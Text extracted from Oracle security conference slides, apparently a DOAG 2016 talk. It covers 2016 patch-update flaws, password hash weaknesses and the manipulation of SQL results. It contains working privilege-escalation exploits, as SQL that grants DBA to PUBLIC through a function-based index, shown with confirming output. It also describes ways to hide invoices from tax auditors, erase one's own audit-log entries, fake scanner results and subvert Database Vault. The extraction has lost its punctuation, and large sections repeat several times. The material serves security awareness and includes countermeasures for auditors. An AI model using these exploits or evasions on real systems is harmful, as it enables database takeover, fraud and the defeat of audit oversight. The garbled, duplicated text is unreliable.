==gt Create an index on SYSTEMHELP using a function based index (FBI) The function getdba is used for the function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSTEMHELP(SYSMAN_APMGETDBA(AK2))
==gt Reconnect is necessary SQLgt select from dba_role_privs where granted_role=DBA and grantee=PUBLIC GRANTEE GRANTED_ROLE ADM DEF ------------------------------ ------------------------------ --- --- PUBLIC DBA NO YES
November 2016
DOAG 2016
Modifying SQL Statements and Application Logic
Scenario 1
Top manager comes to the office of the DBA
and asks youbdquoTomorrow the auditor from the tax authority will
come to check our invoices Could you hide the
10000 EUR invoice just from the auditor from the
last party at the night clubI will increase your salaryhellipldquo
Scenario 2
Remove your own audit entries from the audit
log which is retrieved by the SIEM solution (eg
Splunk QRadar hellip) via JDBC
Scenario 3
You donrsquot have time to harden all your
databases but the security department wants to
see resultsInstead of fixing the problem you will just deliver
the proper results
A lot of different wisheshellip
but luckily we are using Oracle
ProblemampSolution
Oracle offers different features to fulfill these
wishes without affecting other usershellip
All these scenarios have in common that we
have to manipulate SQL statement
Select value hellip
Oracle Data Redaction allows to mask
manipulate the selected data just for a single
database user
Possible Usage replace truefalse replace USERADMINhellip
the DBA can decide what will be returned
Select value hellip
A typical query from security checklistsscanner looks
like this select upper(value) from parameter where upper(name) = XYZ
The tool expects the value TRUE but it contains FALSE
Oracle data redaction allows you to change the
result value from FALSE to TRUE==gt Audit department is happy because the database passes all the security checkshellip
hellip from tableview hellip
Modifying objects can change be used as man
in the middle as well
Possible approaches
modify views (eg add spare=DBA1 to the view dba_audit_trail)All entries of the OSUSER DBA1 will be removed in the view If a SIEM solution retrieves the audit data stuff from DBA1 is not retrieved
create or change synonyms to bdquoredirectldquo objects
replace table with viewinstead of trigger
mdashmdashmdashmdashmdash dbms_macadmmdashmdashmdashmdashmdash FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
SQLgt create or replace view mydual as select X as dummy from dual where user=DVSYS
SQLgt grant select on sysmydual to public SQLgt drop public synonym dual SQLgt create public synonym dual for sysmydual
SYS CAN INFLUENCE DVSYS-ANALYSIS VIA VIEW NAMED DUAL
Red Attack - Die Katastrophe in der Datenbank (Gunther Pipperr)
hellip where x=y
where conditions can be changed using VPD
VPD add where clauseinvoice_name = SAUNA_CLUB CHANTAL
Hide bdquocertainldquo invoices from the audit
department
Select value from tableview where x=y
SQL Translation Framework (12c only) allows to
replace an entire queryUser submits Query A SQL Translation Framework replaces Query A
with Query B
Possible Countermeasures for paranoid Auditors
Add a random string eg aksdjhiuz to avoid
SQL Translation Framework (new SQLID)
Try to get EXEMPT ACCESS POLICY to disable
VPD (even if not used in the application)
Use full qualified names instead of synonyms(eg SYSDUAL instead of DUAL)
Always check the object type (is is really a table)
Use checksums for certain database objects
(especially views)
Check the current schema to avoid attacks
(eg alter session set current_schema=otheruser)
Modifying Queries on the fly
Powerful features for application
(Huge) potential on critical systems to modify
application logic (eg DB Vault)
DBAs and AuditorsSecurity Department should
be aware of powerful Oracle features which
could be used to modify application logic
Audit these features even if not in use
Trends 2017
New hardening documents for Oracle 122
required (new features new packages hellip)
Migration to 122
More auditing projects
Integration Auditing with SIEM solutions
Q amp A
Thank you Contact
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
July 2016 CPU- CVE-2016-3489==gt System does not have access to the SYSLINK$ table SQLgt select count() from syslink$ ERROR at line 1 ORA-01031 insufficient privileges
==gt also the execution of getdba throws an errorSQLgt select getdba(i) from dual ERROR at line 1 ORA-01031 insufficient privileges ORA-06512 at SYSTEMGETDBA line 4 ==gt Now create an index on the table sysincvid using a function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCVID(SYSTEMGETDBA(AK)) Index created SQLgt select count() from syslink$ COUNT() ---------- 11
July 2016 CPU- CVE-2016-3489-- Oracle 12102 (SYSTEM does no longer have INHERIT ANY PRIVILEGE) SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCvid(SYSTEMGETDBA(1)) CREATE INDEX EXPLOIT_INDEX ON SYSINCvid(SYSTEMGETDBA(1)) FEHLER in Zeile 1 ORA-06598 Nicht ausreichende INHERIT PRIVILEGES-Berechtigung ORA-06512 in SYSTEMGETDBA Zeile 1
-- On 12102 the user WMSYS has CREATE ANY INDEX and the SYSTEM user can use the -- CREATE ANY PROCEDURE to create a function in the schema of WMSYS
CREATE OR REPLACE FUNCTION wmsysGETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS PRAGMA AUTONOMOUS_TRANSACTION BEGIN execute immediate grant select on syslink$ to public COMMIT RETURN FOO END SQLgt grant execute on wmsysgetdba to public
-- now we create the index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCVID(WMSYSGETDBA(AK))
August 2016Hackproofing Oraclersquos eBusiness Suite by David
Litchfield
Presentation + Supporting documents
httpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suitepdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-1pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-2pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-3pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-5pdf
September 2016iexcl Nothing special happened
x
October 2016
Oracle CPU October 2016
httpwwworaclecomtechnetworksecurity-advisorycpuoct2016-2881722html
October 2016 CPU
9 security fixes (1 remote exploitable)
1 OJVM (CVSS 91)
2 KernelPDB (CVSS 6460)
3 RDBMS Security (CVSS 64 33 33)
1 APEX (CVSS 61 remote)
1 RDBMS Security amp SQLPlus (CVSS 24)
httpwwworaclecomtechnetworksecurity-advisorycpuoct2016-2881722html
Oct 2016 CPU- CVE-2016-5497
Problem UNSALTED MD5 HASH STILL PRESENT IN
12C DATABASE - DIGEST VERIFIER
Shown as open problem at the DOAG 2015
presentation
Reporter Alexander Kornbrust
Oracle Password Hash 12102+
Oracle 12102 introduced a new PBKDF2
SHA512 based algorithm
The new T Password hash is 10 times slower than
the old DES hash (Oracle 7+) and 88 times slower
than the SHA1-based hash (Oracle 11+)
The new algorithm is known and already
implemented in some tools
Remark Microsoft Office 2013 is 10 times more
time consuming to crack than the new Oracle
PBKDF2
Oracle Password Hash 12102+
Letrsquos have a look at the RFC2617
KD(secret data) = H(concat(secret data))
No salt but a secret
Secret= XDBlsquo
and the hash will be MD5(XDBtiger)
and stored in the spare4-column starting with the HHash
Oct 2016 CPU- CVE-2016-5516
Problem In Oracle 12c the DBMS_PDB_EXEC_SQL
procedure is a wrapper for the
DBMS_PDBEXEC_AS_ORACLE_SCRIPT procedure which executes SQL as the SYS user The XDB user has the execute privilege on
DBMS_PDB_EXEC_SQL and as such by first exploiting
a vulnerability in a publicly executable XDB owned PLSQL object an attacker can leverage this
privilege to execute SQL as SYS The fix changes both
DBMS_PDB_EXEC_SQL and DBMS_PDB from using the
DEFINER rights to the INVOKER rights execution model Reporter David Litchfield
Oct 2016 CPU- CVE-2016-5604
Problem Privilege Escalation in Oracle Cloud
Control (1213)
Reporter Alexander Kornbrust
sqlplus sysman_apmrdsora1 SQLgtdesc dba_users ERROR ORA-04043 object SYSDBA_USERS does not exist
==gt user does not have the privilege to access DBA_USERS SQLgtselect from user_sys_privs USERNAME PRIVILEGE ADM ------------------------------ ---------------------------------------- --- SYSMAN_APM UNLIMITED TABLESPACE NO SYSMAN_APM CREATE VIEW NO SYSMAN_APM CREATE ANY LIBRARY NO SYSMAN_APM CREATE SEQUENCE NO SYSMAN_APM CREATE TABLE NO SYSMAN_APM CREATE LIBRARY NO SYSMAN_APM CREATE ANY INDEX NO
==gt CREATE ANY LIBRARY Privilege is granted to SYSMAN_APM SQLgtselect from user_role_privs USERNAME GRANTED_ROLE ADM DEF OS_ ------------------------------ ------------------------------ --- --- --- SYSMAN_APM CONNECT NO YES NO SYSMAN_APM RESOURCE NO YES NO
==gt Create a function GETDBA to escalate privileges using AUTHID CURRENT_USER SQLgtCREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant dba to public 5 COMMIT 6 RETURN FOO 7 END 8 ==gt Grant execution privileges to PUBLIC SQLgt grant execute on getdba to public
==gt Create an index on SYSTEMHELP using a function based index (FBI) The function getdba is used for the function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSTEMHELP(SYSMAN_APMGETDBA(AK2))
==gt Reconnect is necessary SQLgt select from dba_role_privs where granted_role=DBA and grantee=PUBLIC GRANTEE GRANTED_ROLE ADM DEF ------------------------------ ------------------------------ --- --- PUBLIC DBA NO YES
November 2016
DOAG 2016
Modifying SQL Statements and Application Logic
Scenario 1
Top manager comes to the office of the DBA
and asks youbdquoTomorrow the auditor from the tax authority will
come to check our invoices Could you hide the
10000 EUR invoice just from the auditor from the
last party at the night clubI will increase your salaryhellipldquo
Scenario 2
Remove your own audit entries from the audit
log which is retrieved by the SIEM solution (eg
Splunk QRadar hellip) via JDBC
Scenario 3
You donrsquot have time to harden all your
databases but the security department wants to
see resultsInstead of fixing the problem you will just deliver
the proper results
A lot of different wisheshellip
but luckily we are using Oracle
ProblemampSolution
Oracle offers different features to fulfill these
wishes without affecting other usershellip
All these scenarios have in common that we
have to manipulate SQL statement
Select value hellip
Oracle Data Redaction allows to mask
manipulate the selected data just for a single
database user
Possible Usage replace truefalse replace USERADMINhellip
the DBA can decide what will be returned
Select value hellip
A typical query from security checklistsscanner looks
like this select upper(value) from parameter where upper(name) = XYZ
The tool expects the value TRUE but it contains FALSE
Oracle data redaction allows you to change the
result value from FALSE to TRUE==gt Audit department is happy because the database passes all the security checkshellip
hellip from tableview hellip
Modifying objects can change be used as man
in the middle as well
Possible approaches
modify views (eg add spare=DBA1 to the view dba_audit_trail)All entries of the OSUSER DBA1 will be removed in the view If a SIEM solution retrieves the audit data stuff from DBA1 is not retrieved
create or change synonyms to bdquoredirectldquo objects
replace table with viewinstead of trigger
mdashmdashmdashmdashmdash dbms_macadmmdashmdashmdashmdashmdash FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
SQLgt create or replace view mydual as select X as dummy from dual where user=DVSYS
SQLgt grant select on sysmydual to public SQLgt drop public synonym dual SQLgt create public synonym dual for sysmydual
SYS CAN INFLUENCE DVSYS-ANALYSIS VIA VIEW NAMED DUAL
Red Attack - Die Katastrophe in der Datenbank (Gunther Pipperr)
hellip where x=y
where conditions can be changed using VPD
VPD add where clauseinvoice_name = SAUNA_CLUB CHANTAL
Hide bdquocertainldquo invoices from the audit
department
Select value from tableview where x=y
SQL Translation Framework (12c only) allows to
replace an entire queryUser submits Query A SQL Translation Framework replaces Query A
with Query B
Possible Countermeasures for paranoid Auditors
Add a random string eg aksdjhiuz to avoid
SQL Translation Framework (new SQLID)
Try to get EXEMPT ACCESS POLICY to disable
VPD (even if not used in the application)
Use full qualified names instead of synonyms(eg SYSDUAL instead of DUAL)
Always check the object type (is is really a table)
Use checksums for certain database objects
(especially views)
Check the current schema to avoid attacks
(eg alter session set current_schema=otheruser)
Modifying Queries on the fly
Powerful features for application
(Huge) potential on critical systems to modify
application logic (eg DB Vault)
DBAs and AuditorsSecurity Department should
be aware of powerful Oracle features which
could be used to modify application logic
Audit these features even if not in use
Trends 2017
New hardening documents for Oracle 122
required (new features new packages hellip)
Migration to 122
More auditing projects
Integration Auditing with SIEM solutions
Q amp A
Thank you Contact
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
July 2016 CPU- CVE-2016-3489-- Oracle 12102 (SYSTEM does no longer have INHERIT ANY PRIVILEGE) SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCvid(SYSTEMGETDBA(1)) CREATE INDEX EXPLOIT_INDEX ON SYSINCvid(SYSTEMGETDBA(1)) FEHLER in Zeile 1 ORA-06598 Nicht ausreichende INHERIT PRIVILEGES-Berechtigung ORA-06512 in SYSTEMGETDBA Zeile 1
-- On 12102 the user WMSYS has CREATE ANY INDEX and the SYSTEM user can use the -- CREATE ANY PROCEDURE to create a function in the schema of WMSYS
CREATE OR REPLACE FUNCTION wmsysGETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS PRAGMA AUTONOMOUS_TRANSACTION BEGIN execute immediate grant select on syslink$ to public COMMIT RETURN FOO END SQLgt grant execute on wmsysgetdba to public
-- now we create the index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCVID(WMSYSGETDBA(AK))
August 2016Hackproofing Oraclersquos eBusiness Suite by David
Litchfield
Presentation + Supporting documents
httpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suitepdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-1pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-2pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-3pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-5pdf
September 2016iexcl Nothing special happened
x
October 2016
Oracle CPU October 2016
httpwwworaclecomtechnetworksecurity-advisorycpuoct2016-2881722html
October 2016 CPU
9 security fixes (1 remote exploitable)
1 OJVM (CVSS 91)
2 KernelPDB (CVSS 6460)
3 RDBMS Security (CVSS 64 33 33)
1 APEX (CVSS 61 remote)
1 RDBMS Security amp SQLPlus (CVSS 24)
httpwwworaclecomtechnetworksecurity-advisorycpuoct2016-2881722html
Oct 2016 CPU- CVE-2016-5497
Problem UNSALTED MD5 HASH STILL PRESENT IN
12C DATABASE - DIGEST VERIFIER
Shown as open problem at the DOAG 2015
presentation
Reporter Alexander Kornbrust
Oracle Password Hash 12102+
Oracle 12102 introduced a new PBKDF2
SHA512 based algorithm
The new T Password hash is 10 times slower than
the old DES hash (Oracle 7+) and 88 times slower
than the SHA1-based hash (Oracle 11+)
The new algorithm is known and already
implemented in some tools
Remark Microsoft Office 2013 is 10 times more
time consuming to crack than the new Oracle
PBKDF2
Oracle Password Hash 12102+
Letrsquos have a look at the RFC2617
KD(secret data) = H(concat(secret data))
No salt but a secret
Secret= XDBlsquo
and the hash will be MD5(XDBtiger)
and stored in the spare4-column starting with the HHash
Oct 2016 CPU- CVE-2016-5516
Problem In Oracle 12c the DBMS_PDB_EXEC_SQL
procedure is a wrapper for the
DBMS_PDBEXEC_AS_ORACLE_SCRIPT procedure which executes SQL as the SYS user The XDB user has the execute privilege on
DBMS_PDB_EXEC_SQL and as such by first exploiting
a vulnerability in a publicly executable XDB owned PLSQL object an attacker can leverage this
privilege to execute SQL as SYS The fix changes both
DBMS_PDB_EXEC_SQL and DBMS_PDB from using the
DEFINER rights to the INVOKER rights execution model Reporter David Litchfield
Oct 2016 CPU- CVE-2016-5604
Problem Privilege Escalation in Oracle Cloud
Control (1213)
Reporter Alexander Kornbrust
sqlplus sysman_apmrdsora1 SQLgtdesc dba_users ERROR ORA-04043 object SYSDBA_USERS does not exist
==gt user does not have the privilege to access DBA_USERS SQLgtselect from user_sys_privs USERNAME PRIVILEGE ADM ------------------------------ ---------------------------------------- --- SYSMAN_APM UNLIMITED TABLESPACE NO SYSMAN_APM CREATE VIEW NO SYSMAN_APM CREATE ANY LIBRARY NO SYSMAN_APM CREATE SEQUENCE NO SYSMAN_APM CREATE TABLE NO SYSMAN_APM CREATE LIBRARY NO SYSMAN_APM CREATE ANY INDEX NO
==gt CREATE ANY LIBRARY Privilege is granted to SYSMAN_APM SQLgtselect from user_role_privs USERNAME GRANTED_ROLE ADM DEF OS_ ------------------------------ ------------------------------ --- --- --- SYSMAN_APM CONNECT NO YES NO SYSMAN_APM RESOURCE NO YES NO
==gt Create a function GETDBA to escalate privileges using AUTHID CURRENT_USER SQLgtCREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant dba to public 5 COMMIT 6 RETURN FOO 7 END 8 ==gt Grant execution privileges to PUBLIC SQLgt grant execute on getdba to public
==gt Create an index on SYSTEMHELP using a function based index (FBI) The function getdba is used for the function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSTEMHELP(SYSMAN_APMGETDBA(AK2))
==gt Reconnect is necessary SQLgt select from dba_role_privs where granted_role=DBA and grantee=PUBLIC GRANTEE GRANTED_ROLE ADM DEF ------------------------------ ------------------------------ --- --- PUBLIC DBA NO YES
November 2016
DOAG 2016
Modifying SQL Statements and Application Logic
Scenario 1
Top manager comes to the office of the DBA
and asks youbdquoTomorrow the auditor from the tax authority will
come to check our invoices Could you hide the
10000 EUR invoice just from the auditor from the
last party at the night clubI will increase your salaryhellipldquo
Scenario 2
Remove your own audit entries from the audit
log which is retrieved by the SIEM solution (eg
Splunk QRadar hellip) via JDBC
Scenario 3
You donrsquot have time to harden all your
databases but the security department wants to
see resultsInstead of fixing the problem you will just deliver
the proper results
A lot of different wisheshellip
but luckily we are using Oracle
ProblemampSolution
Oracle offers different features to fulfill these
wishes without affecting other usershellip
All these scenarios have in common that we
have to manipulate SQL statement
Select value hellip
Oracle Data Redaction allows to mask
manipulate the selected data just for a single
database user
Possible Usage replace truefalse replace USERADMINhellip
the DBA can decide what will be returned
Select value hellip
A typical query from security checklistsscanner looks
like this select upper(value) from parameter where upper(name) = XYZ
The tool expects the value TRUE but it contains FALSE
Oracle data redaction allows you to change the
result value from FALSE to TRUE==gt Audit department is happy because the database passes all the security checkshellip
hellip from tableview hellip
Modifying objects can change be used as man
in the middle as well
Possible approaches
modify views (eg add spare=DBA1 to the view dba_audit_trail)All entries of the OSUSER DBA1 will be removed in the view If a SIEM solution retrieves the audit data stuff from DBA1 is not retrieved
create or change synonyms to bdquoredirectldquo objects
replace table with viewinstead of trigger
mdashmdashmdashmdashmdash dbms_macadmmdashmdashmdashmdashmdash FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
SQLgt create or replace view mydual as select X as dummy from dual where user=DVSYS
SQLgt grant select on sysmydual to public SQLgt drop public synonym dual SQLgt create public synonym dual for sysmydual
SYS CAN INFLUENCE DVSYS-ANALYSIS VIA VIEW NAMED DUAL
Red Attack - Die Katastrophe in der Datenbank (Gunther Pipperr)
hellip where x=y
where conditions can be changed using VPD
VPD add where clauseinvoice_name = SAUNA_CLUB CHANTAL
Hide bdquocertainldquo invoices from the audit
department
Select value from tableview where x=y
SQL Translation Framework (12c only) allows to
replace an entire queryUser submits Query A SQL Translation Framework replaces Query A
with Query B
Possible Countermeasures for paranoid Auditors
Add a random string eg aksdjhiuz to avoid
SQL Translation Framework (new SQLID)
Try to get EXEMPT ACCESS POLICY to disable
VPD (even if not used in the application)
Use full qualified names instead of synonyms(eg SYSDUAL instead of DUAL)
Always check the object type (is is really a table)
Use checksums for certain database objects
(especially views)
Check the current schema to avoid attacks
(eg alter session set current_schema=otheruser)
Modifying Queries on the fly
Powerful features for application
(Huge) potential on critical systems to modify
application logic (eg DB Vault)
DBAs and AuditorsSecurity Department should
be aware of powerful Oracle features which
could be used to modify application logic
Audit these features even if not in use
Trends 2017
New hardening documents for Oracle 122
required (new features new packages hellip)
Migration to 122
More auditing projects
Integration Auditing with SIEM solutions
Q amp A
Thank you Contact
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
August 2016Hackproofing Oraclersquos eBusiness Suite by David
Litchfield
Presentation + Supporting documents
httpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suitepdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-1pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-2pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-3pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-5pdf
September 2016iexcl Nothing special happened
x
October 2016
Oracle CPU October 2016
httpwwworaclecomtechnetworksecurity-advisorycpuoct2016-2881722html
October 2016 CPU
9 security fixes (1 remote exploitable)
1 OJVM (CVSS 91)
2 KernelPDB (CVSS 6460)
3 RDBMS Security (CVSS 64 33 33)
1 APEX (CVSS 61 remote)
1 RDBMS Security amp SQLPlus (CVSS 24)
httpwwworaclecomtechnetworksecurity-advisorycpuoct2016-2881722html
Oct 2016 CPU- CVE-2016-5497
Problem UNSALTED MD5 HASH STILL PRESENT IN
12C DATABASE - DIGEST VERIFIER
Shown as open problem at the DOAG 2015
presentation
Reporter Alexander Kornbrust
Oracle Password Hash 12102+
Oracle 12102 introduced a new PBKDF2
SHA512 based algorithm
The new T Password hash is 10 times slower than
the old DES hash (Oracle 7+) and 88 times slower
than the SHA1-based hash (Oracle 11+)
The new algorithm is known and already
implemented in some tools
Remark Microsoft Office 2013 is 10 times more
time consuming to crack than the new Oracle
PBKDF2
Oracle Password Hash 12102+
Letrsquos have a look at the RFC2617
KD(secret data) = H(concat(secret data))
No salt but a secret
Secret= XDBlsquo
and the hash will be MD5(XDBtiger)
and stored in the spare4-column starting with the HHash
Oct 2016 CPU- CVE-2016-5516
Problem In Oracle 12c the DBMS_PDB_EXEC_SQL
procedure is a wrapper for the
DBMS_PDBEXEC_AS_ORACLE_SCRIPT procedure which executes SQL as the SYS user The XDB user has the execute privilege on
DBMS_PDB_EXEC_SQL and as such by first exploiting
a vulnerability in a publicly executable XDB owned PLSQL object an attacker can leverage this
privilege to execute SQL as SYS The fix changes both
DBMS_PDB_EXEC_SQL and DBMS_PDB from using the
DEFINER rights to the INVOKER rights execution model Reporter David Litchfield
Oct 2016 CPU- CVE-2016-5604
Problem Privilege Escalation in Oracle Cloud
Control (1213)
Reporter Alexander Kornbrust
sqlplus sysman_apmrdsora1 SQLgtdesc dba_users ERROR ORA-04043 object SYSDBA_USERS does not exist
==gt user does not have the privilege to access DBA_USERS SQLgtselect from user_sys_privs USERNAME PRIVILEGE ADM ------------------------------ ---------------------------------------- --- SYSMAN_APM UNLIMITED TABLESPACE NO SYSMAN_APM CREATE VIEW NO SYSMAN_APM CREATE ANY LIBRARY NO SYSMAN_APM CREATE SEQUENCE NO SYSMAN_APM CREATE TABLE NO SYSMAN_APM CREATE LIBRARY NO SYSMAN_APM CREATE ANY INDEX NO
==gt CREATE ANY LIBRARY Privilege is granted to SYSMAN_APM SQLgtselect from user_role_privs USERNAME GRANTED_ROLE ADM DEF OS_ ------------------------------ ------------------------------ --- --- --- SYSMAN_APM CONNECT NO YES NO SYSMAN_APM RESOURCE NO YES NO
==gt Create a function GETDBA to escalate privileges using AUTHID CURRENT_USER SQLgtCREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant dba to public 5 COMMIT 6 RETURN FOO 7 END 8 ==gt Grant execution privileges to PUBLIC SQLgt grant execute on getdba to public
==gt Create an index on SYSTEMHELP using a function based index (FBI) The function getdba is used for the function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSTEMHELP(SYSMAN_APMGETDBA(AK2))
==gt Reconnect is necessary SQLgt select from dba_role_privs where granted_role=DBA and grantee=PUBLIC GRANTEE GRANTED_ROLE ADM DEF ------------------------------ ------------------------------ --- --- PUBLIC DBA NO YES
November 2016
DOAG 2016
Modifying SQL Statements and Application Logic
Scenario 1
Top manager comes to the office of the DBA
and asks youbdquoTomorrow the auditor from the tax authority will
come to check our invoices Could you hide the
10000 EUR invoice just from the auditor from the
last party at the night clubI will increase your salaryhellipldquo
Scenario 2
Remove your own audit entries from the audit
log which is retrieved by the SIEM solution (eg
Splunk QRadar hellip) via JDBC
Scenario 3
You donrsquot have time to harden all your
databases but the security department wants to
see resultsInstead of fixing the problem you will just deliver
the proper results
A lot of different wisheshellip
but luckily we are using Oracle
ProblemampSolution
Oracle offers different features to fulfill these
wishes without affecting other usershellip
All these scenarios have in common that we
have to manipulate SQL statement
Select value hellip
Oracle Data Redaction allows to mask
manipulate the selected data just for a single
database user
Possible Usage replace truefalse replace USERADMINhellip
the DBA can decide what will be returned
Select value hellip
A typical query from security checklistsscanner looks
like this select upper(value) from parameter where upper(name) = XYZ
The tool expects the value TRUE but it contains FALSE
Oracle data redaction allows you to change the
result value from FALSE to TRUE==gt Audit department is happy because the database passes all the security checkshellip
hellip from tableview hellip
Modifying objects can change be used as man
in the middle as well
Possible approaches
modify views (eg add spare=DBA1 to the view dba_audit_trail)All entries of the OSUSER DBA1 will be removed in the view If a SIEM solution retrieves the audit data stuff from DBA1 is not retrieved
create or change synonyms to bdquoredirectldquo objects
replace table with viewinstead of trigger
mdashmdashmdashmdashmdash dbms_macadmmdashmdashmdashmdashmdash FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
SQLgt create or replace view mydual as select X as dummy from dual where user=DVSYS
SQLgt grant select on sysmydual to public SQLgt drop public synonym dual SQLgt create public synonym dual for sysmydual
SYS CAN INFLUENCE DVSYS-ANALYSIS VIA VIEW NAMED DUAL
Red Attack - Die Katastrophe in der Datenbank (Gunther Pipperr)
hellip where x=y
where conditions can be changed using VPD
VPD add where clauseinvoice_name = SAUNA_CLUB CHANTAL
Hide bdquocertainldquo invoices from the audit
department
Select value from tableview where x=y
SQL Translation Framework (12c only) allows to
replace an entire queryUser submits Query A SQL Translation Framework replaces Query A
with Query B
Possible Countermeasures for paranoid Auditors
Add a random string eg aksdjhiuz to avoid
SQL Translation Framework (new SQLID)
Try to get EXEMPT ACCESS POLICY to disable
VPD (even if not used in the application)
Use full qualified names instead of synonyms(eg SYSDUAL instead of DUAL)
Always check the object type (is is really a table)
Use checksums for certain database objects
(especially views)
Check the current schema to avoid attacks
(eg alter session set current_schema=otheruser)
Modifying Queries on the fly
Powerful features for application
(Huge) potential on critical systems to modify
application logic (eg DB Vault)
DBAs and AuditorsSecurity Department should
be aware of powerful Oracle features which
could be used to modify application logic
Audit these features even if not in use
Trends 2017
New hardening documents for Oracle 122
required (new features new packages hellip)
Migration to 122
More auditing projects
Integration Auditing with SIEM solutions
Q amp A
Thank you Contact
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
September 2016iexcl Nothing special happened
x
October 2016
Oracle CPU October 2016
httpwwworaclecomtechnetworksecurity-advisorycpuoct2016-2881722html
October 2016 CPU
9 security fixes (1 remote exploitable)
1 OJVM (CVSS 91)
2 KernelPDB (CVSS 6460)
3 RDBMS Security (CVSS 64 33 33)
1 APEX (CVSS 61 remote)
1 RDBMS Security amp SQLPlus (CVSS 24)
httpwwworaclecomtechnetworksecurity-advisorycpuoct2016-2881722html
Oct 2016 CPU- CVE-2016-5497
Problem UNSALTED MD5 HASH STILL PRESENT IN
12C DATABASE - DIGEST VERIFIER
Shown as open problem at the DOAG 2015
presentation
Reporter Alexander Kornbrust
Oracle Password Hash 12102+
Oracle 12102 introduced a new PBKDF2
SHA512 based algorithm
The new T Password hash is 10 times slower than
the old DES hash (Oracle 7+) and 88 times slower
than the SHA1-based hash (Oracle 11+)
The new algorithm is known and already
implemented in some tools
Remark Microsoft Office 2013 is 10 times more
time consuming to crack than the new Oracle
PBKDF2
Oracle Password Hash 12102+
Letrsquos have a look at the RFC2617
KD(secret data) = H(concat(secret data))
No salt but a secret
Secret= XDBlsquo
